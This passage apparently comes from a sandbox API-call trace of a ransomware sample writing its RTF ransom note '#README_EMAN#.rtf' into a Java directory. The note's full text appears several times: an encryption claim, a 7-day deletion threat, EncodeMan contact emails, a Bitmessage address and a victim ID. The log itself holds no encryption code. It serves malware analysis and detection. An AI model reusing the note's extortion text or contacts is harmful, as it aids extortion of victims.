w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0220.700] WriteFile (in: hFile=0x2f4, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0220.701] CloseHandle (hObject=0x2f4) returned 1 [0220.701] GetFileAttributesW (lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\oracle\\java\\javapath\\#readme_eman#.rtf")) returned 0xffffffff [0220.701] GetLastError () returned 0x2 [0220.701] CreateFileW (lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\oracle\\java\\javapath\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0221.302] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0221.302] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 